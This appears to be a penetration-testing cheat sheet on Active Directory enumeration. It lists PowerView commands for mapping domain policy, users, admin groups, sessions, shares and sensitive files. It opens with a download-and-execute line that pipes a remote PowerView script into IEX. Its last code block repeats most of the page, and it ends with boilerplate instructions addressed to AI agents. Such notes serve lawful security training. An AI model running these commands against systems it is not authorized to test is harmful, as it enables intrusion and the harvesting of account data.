# AD Enumeration

### Files transfer 

### Linux to Windows

{% code overflow="wrap" %}

```powershell
#from Linux to Windows
#Local
(new-object system.net.webclient).downloadstring('http://192.168.1.1/powerview.ps1') | IEX
#Remotly
(new-object system.net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1') | IEX

```

{% endcode %}

### Windows to  Linux

<pre class="language-bash"><code class="lang-bash">scp local_file username@hostname_or_ip:/remote/path
#Example
<strong>scp 20240830124156_BloodHound.zip kali@10.50.57.149:/var/www/uploads
</strong></code></pre>

## PowerView Enumeration

### Get current domain

```
Get-NetDomain
```

### Get object of another domain

```
Get-NetDomain -Domain moneycorp.local
```

### Get domain SID for the current domain

```
Get-DomainSID
```

### Get domain policy for the current domain

```
Get-DomainPolicy
(Get-DomainPolicy)." system access"
```

### Get domain policy for another domain

```
(Get-DomainPolicy -domain moneycorp.local)."system access"
(Get-DomainPolicy -domain moneycorp.local)."kerberos policy"
(Get-DomainPolicy -domain moneycorp.local)."Privilege Rights"
# OR
(Get-DomainPolicy)."KerberosPolicy" #Kerberos tickets info(MaxServiceAge)
(Get-DomainPolicy)."SystemAccess" #Password policy
(Get-DomainPolicy).PrivilegeRights #Check your privileges
```

### Get domain controllers for the current domain

```
Get-NetDomainController
```

### Get domain controllers for another domain

```
Get-NetDomainController -Domain moneycorp.local
```

### Get a list of users in the current domain

```
Get-NetUser
Get-NetUser -Username student1
```

### Get list of all properties for users in the current domain

```
Get-UserProperty
Get-UserProperty -Properties pwdlastset,logoncount,badpwdcount
Get-UserProperty -Properties logoncount
Get-UserProperty -Properties badpwdcount
```

### Search for a particular string in a user's attributes

```
Find-UserField -SearchField Description -SearchTerm "built"
```

### Get a list of computers in the current domain

```
Get-NetComputer
Get-NetComputer -OperatingSystem "*Server 2016*"
Get-NetComputer -Ping
Get-NetComputer -FullData
```

### Get all the groups in the current domain

```
Get-NetGroup
Get-NetGroup -Domain <targetdomain>
Get-NetGroup -FullData
Get-NetComputer -Domain
```

### Get all groups containing the word "admin" in group name

```
Get-NetGroup *admin*
Get-NetGroup -GroupName *admin*
Get-NetGroup *admin* -FullData
Get-NetGroup -GroupName *admin* -Doamin moneycorp.local
```

### Get all the members of the Domain Admins group

```
Get-NetGroupMember -GroupName "Domain Admins" -Recurse
#test the below command
#Get-NetGroupMember -GroupName "Domain Admins" -Properties * | select DistinguishedName,GroupCategory,GroupScope,Name,Members
```

### Get the group membership for a user

```
Get-NetGroup -UserName "student1"
```

### List all the local groups on a machine (needs administrator privs on non-dc machines)

```
Get-NetLocalGroup -ComputerName dcorp-dc.dollarcorp.moneycorp.local -ListGroups
```

### Get members of all the local groups on a machine (needs administrator privs on non-dc machines)

```
Get-NetLocalGroup -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Recurse
```

### Get actively logged users on a computer (needs local admin rights on the target)

```
Get-NetLoggedon -ComputerName dcorp-dc.dollarcorp.moneycorp.local 
```

### Get locally logged users on a computer (needs remote registry on the target - started by default on server OS)

```
Get-LoggedonLocal -ComputerName dcorp-dc.dollarcorp.moneycorp.local 
```

### Get the last logged user on a computer (needs administrative rights and remote registry on the target)

```
Get-LastLoggedon -ComputerName <servername>
```

### Find shares on hosts in the current domain.

```
Invoke-ShareFinder -Verbose
```

### Find sensitive files on computers in the domain

```
Invoke-FileFinder -Verbose
```

### Get all fileservers of the domain

```powershell
Get-NetFileServerPowerView Enumeration
Get current domain
Get-NetDomain
Get object of another domain
Get-NetDomain -Domain moneycorp.local
Get domain SID for the current domain
Get-DomainSID
Get domain policy for the current domain
Get-DomainPolicy
(Get-DomainPolicy)."system access"
Get domain policy for another domain
(Get-DomainPolicy -domain moneycorp.local)."system access"
(Get-DomainPolicy -domain moneycorp.local)."kerberos policy"
(Get-DomainPolicy -domain moneycorp.local)."Privilege Rights"
# OR
(Get-DomainPolicy)."KerberosPolicy" #Kerberos tickets info(MaxServiceAge)
(Get-DomainPolicy)."SystemAccess" #Password policy
(Get-DomainPolicy).PrivilegeRights #Check your privileges
Get domain controllers for the current domain
Get-NetDomainController
Get domain controllers for another domain
Get-NetDomainController -Domain moneycorp.local
Get a list of users in the current domain
Get-NetUser
Get-NetUser -Username student1
Get list of all properties for users in the current domain
Get-UserProperty
Get-UserProperty -Properties pwdlastset,logoncount,badpwdcount
Get-UserProperty -Properties logoncount
Get-UserProperty -Properties badpwdcount
Search for a particular string in a user's attributes
Find-UserField -SearchField Description -SearchTerm "built"
Get a list of computers in the current domain
Get-NetComputer
Get-NetComputer -OperatingSystem "*Server 2016*"
Get-NetComputer -Ping
Get-NetComputer -FullData
Get all the groups in the current domain
Get-NetGroup
Get-NetGroup -Domain <targetdomain>
Get-NetGroup -FullData
Get-NetComputer -Domain
Get all groups containing the word "admin" in group name
Get-NetGroup *admin*
Get-NetGroup -GroupName *admin*
Get-NetGroup *admin* -FullData
Get-NetGroup -GroupName *admin* -Doamin moneycorp.local
Get all the members of the Domain Admins group
Get-NetGroupMember -GroupName "Domain Admins" -Recurse
#test the below command
#Get-NetGroupMember -GroupName "Domain Admins" -Properties * | select DistinguishedName,GroupCategory,GroupScope,Name,Members
Get the group membership for a user
Get-NetGroup -UserName "student1"
List all the local groups on a machine (needs administrator privs on non-dc machines)
Get-NetLocalGroup -ComputerName dcorp-dc.dollarcorp.moneycorp.local -ListGroups
Get members of all the local groups on a machine (needs administrator privs on non-dc machines)
Get-NetLocalGroup -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Recurse
Get actively logged users on a computer (needs local admin rights on the target)
Get-NetLoggedon -ComputerName dcorp-dc.dollarcorp.moneycorp.local 
Get locally logged users on a computer (needs remote registry on the target - started by-default on server OS)
Get-LoggedonLocal -ComputerName dcorp-dc.dollarcorp.moneycorp.local 
Get the last logged user on a computer (needs administrative rights and remote registry on the target)
Get-LastLoggedon -ComputerName <servername>
Find shares on hosts in current domain.
Invoke-ShareFinder -Verbose
Find sensitive files on computers in the domain
Invoke-FileFinder -Verbose
Get all fileservers of the domain
Get-NetFileServer
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://h3ckt0r.gitbook.io/0xsec/elite/network-pentest/active-directory/ad-enumeration.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.